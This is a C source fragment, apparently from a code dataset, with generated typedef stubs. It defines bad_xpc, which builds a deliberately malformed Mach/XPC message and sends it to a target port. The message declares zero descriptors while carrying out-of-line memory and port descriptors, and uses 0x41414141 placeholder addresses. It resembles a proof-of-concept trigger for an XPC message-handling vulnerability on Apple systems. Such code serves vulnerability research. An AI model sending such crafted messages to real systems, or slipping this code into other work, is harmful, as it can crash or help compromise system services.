
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_10__ TYPE_5__ ;
typedef struct TYPE_9__ TYPE_4__ ;
typedef struct TYPE_8__ TYPE_3__ ;
typedef struct TYPE_7__ TYPE_2__ ;
typedef struct TYPE_6__ TYPE_1__ ;


struct TYPE_10__ {int msgh_size; int msgh_id; int msgh_remote_port; int msgh_bits; } ;
struct TYPE_9__ {int address; int size; void* type; } ;
struct TYPE_8__ {int name; int disposition; int type; } ;
struct TYPE_7__ {int address; int size; void* type; } ;
struct TYPE_6__ {scalar_t__ msgh_descriptor_count; } ;
struct xpc_bad_ool {TYPE_5__ hdr; TYPE_4__ ool2; TYPE_3__ port1; TYPE_2__ ool0; TYPE_1__ body; int member_0; } ;
typedef int msg ;
typedef int mach_port_t ;
typedef scalar_t__ kern_return_t ;


 int EXIT_FAILURE ;
 scalar_t__ KERN_SUCCESS ;
 int MACH_MSGH_BITS_COMPLEX ;
 int MACH_MSGH_BITS_SET (int ,int ,int ,int ) ;
 void* MACH_MSG_OOL_DESCRIPTOR ;
 int MACH_MSG_OPTION_NONE ;
 int MACH_MSG_PORT_DESCRIPTOR ;
 int MACH_MSG_TIMEOUT_NONE ;
 int MACH_MSG_TYPE_COPY_SEND ;
 int MACH_PORT_NULL ;
 int MACH_SEND_MSG ;
 int exit (int ) ;
 char* mach_error_string (scalar_t__) ;
 scalar_t__ mach_msg (TYPE_5__*,int,int,int ,int ,int ,int ) ;
 int printf (char*,...) ;

void bad_xpc(mach_port_t p) {
  kern_return_t err;
  struct xpc_bad_ool msg = {0};

  msg.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
  msg.hdr.msgh_size = sizeof(msg);
  msg.hdr.msgh_remote_port = p;
  msg.hdr.msgh_id = 0x10000000;

  msg.body.msgh_descriptor_count = 0;

  msg.ool0.address = 0x414141414141;
  msg.ool0.size = 0x4000;
  msg.ool0.type = MACH_MSG_OOL_DESCRIPTOR;

  msg.port1.name = 0x41414141;
  msg.port1.disposition = 0x11;
  msg.port1.type = MACH_MSG_PORT_DESCRIPTOR;

  msg.ool2.address = 0x414141414141;
  msg.ool2.size = 0x4000;
  msg.ool2.type = MACH_MSG_OOL_DESCRIPTOR;


  err = mach_msg(&msg.hdr,
                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                 msg.hdr.msgh_size,
                 0,
                 MACH_PORT_NULL,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);
  if (err != KERN_SUCCESS) {
    printf("xpc message send failed: %s\n", mach_error_string(err));
    exit(EXIT_FAILURE);
  } else {
    printf("sent xpc message\n");
  }

}
